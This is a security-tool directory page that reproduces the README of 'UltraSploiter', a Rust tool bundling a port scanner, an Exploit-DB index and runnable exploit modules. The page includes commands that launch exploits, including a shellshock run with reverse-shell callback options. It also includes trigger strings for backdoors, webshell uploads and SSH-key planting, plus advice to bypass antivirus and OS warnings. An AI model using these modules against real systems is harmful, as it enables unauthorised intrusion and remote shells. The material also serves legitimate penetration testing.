Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
ultrasploiter — A single binary that folds a port scanner, the full Exploit-DB index (47k entries) and runnable exploit modules into one tool. Written in Rust, runs on Linux, Windows and macOS. | Kitploit
Tools/GitLabGitLab/vqkro/ultrasploiter
Penetration Testing FrameworksReconnaissanceVulnerability ScannersExploit FrameworksNetwork MappingPort ScanningExploitationWeb Application ExploitationInformation GatheringCommand and ControlRed Teaming
1013h 8m agoNot yet reviewed
Payload Development
GitLabvqkro/ultrasploiter

ultrasploiter

A single binary that folds a port scanner, the full Exploit-DB index (47k entries) and runnable exploit modules into one tool. Written in Rust, runs on Linux, Windows and macOS.

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

UltraSploiter

scan, match, exploit — one IP in, shells out.

A single binary that folds a port scanner, the full Exploit-DB index, and a set of runnable exploit modules into one tool. Runs on Linux, Windows and macOS.

jobnormallyhere
Find services on a hostnmapUltraSploiter scan <ip>
Look up exploitssearchsploitUltraSploiter search <kw>
Fire themmsfconsoleUltraSploiter exploit <ip> <module>

UltraSploiter menu


Install

The simplest and best way is to just grab the prebuilt binary and run it. Nothing to install, no dependencies — one self-contained file.

Download from the Releases page:

  • Windows — UltraSploiter-windows-x86_64.exe → double-click
  • Linux — UltraSploiter-linux-x86_64
  • macOS — no prebuilt binary yet; build it in one command (below)

Heads-up: security tools get flagged. Windows SmartScreen and antivirus will likely warn or quarantine the binary — click More info → Run anyway, or add an exclusion if you're keeping it around.

Windows

Double-click UltraSploiter.exe. The menu opens.

If SmartScreen warns about an unknown publisher (it will, for any unsigned binary), click More info → Run anyway.

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

If Gatekeeper blocks it (again, any unsigned binary), either right-click → Open, or clear the quarantine flag once:

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

Build from source

Only needed if there's no binary for your platform, or you want to modify it. Rust 1.74+ is required.

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

build.ps1 uses the stable-x86_64-pc-windows-gnu toolchain, which links with MinGW — so you don't need Visual Studio or MSVC. It installs that toolchain if it's missing. If you already have MSVC Build Tools, a plain cargo build --release works too.

Windows + GNU heads-up: windows-sys (pulled in by tokio) invokes dlltool, which shells out to the assembler as — and the rust-mingw component doesn't ship as. build.ps1 looks for a MinGW bin that has it in %~dp0tools\mingw64\bin and %USERPROFILE%\tools\mingw64\bin, and prepends it to PATH when found. Drop a winlibs build there if you hit error calling dlltool. MSVC toolchains are unaffected.


Run it

With no arguments you get the menu:

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

Command line

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

On Linux/macOS, prefix with ./ (e.g. ./UltraSploiter scan 10.0.0.5).

Scan flags

flagmeaning
-p <spec>top (1000), 80,443, 1-1024, - (all)
-T0..-T5timing template — slower/quieter to faster/noisier
-sUUDP probe scan
-sVservice/version detection (on by default)
--no-bannerskip banner grabbing
--jsonJSON to stdout
-oX <file>nmap-style XML

The scanner is asynchronous (tokio): each -T level sets how many sockets are in flight at once (up to 8000 at -T5), so it covers the nmap top-1000 in a couple of seconds. Every "open" is a completed TCP handshake, so results are exact.

Options (-o key=value)

keyused bymeaning
lhost, lportrev-shell modulescallback address
rportweb modulesoverride the HTTP port
pathshellshock, struts, phpunitendpoint path
user, passtomcat_managermanager credentials
coresolr_rceSolr core name
filegrafana_lfifile to read
ssh_pubkeyredis_unauthkey to drop into authorized_keys
src, dstproftpd_modcopycopy source / destination
timeoutallsocket timeout seconds

Exploit database

search and info are backed by the full Exploit-DB index — 47,000+ entries (the same dataset searchsploit uses), bundled into the binary. When an entry carries a CVE that a runnable module implements, info links the two:

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

Runnable modules (37)

moduleCVEtrigger
vsftpd_234CVE-2011-2523:) username → root bind shell on 6200
unrealircd_backdoorCVE-2010-2075AB; <cmd> over IRC
distcc_execCVE-2004-2687DIST protocol compiler argument
proftpd_modcopyCVE-2015-3306SITE CPFR/CPTO file copy
redis_unauth—CONFIG SET writes a key or cron entry
shellshockCVE-2014-6271User-Agent: () { :; }; <cmd>
struts2_5638CVE-2017-5638OGNL in Content-Type
tomcat_putCVE-2017-12615PUT a JSP webshell
tomcat_manager—deploy a WAR via /manager
elasticsearch_groovyCVE-2015-1427Groovy RCE in _search
drupalgeddon2CVE-2018-7600Form API render callback
phpunit_evalCVE-2017-9841eval-stdin.php
jenkins_scriptCVE-2019-1003000unauthenticated /script Groovy
solr_rceCVE-2019-17558Velocity template in stream.body
grafana_lfiCVE-2021-43798plugin path traversal file read
webmin_backdoorCVE-2019-15107password_change.cgi pipes a value into a shell
php_cgi_arg_injectionCVE-2012-1823-d auto_prepend_file via the query string

Each implements a non-destructive check() and a run().

Catalog modules (data-driven)

These are small JSON recipes run by the catalog engine in data/catalog.json. Adding a module is ~8 lines of data, not a new source file:

Download Tool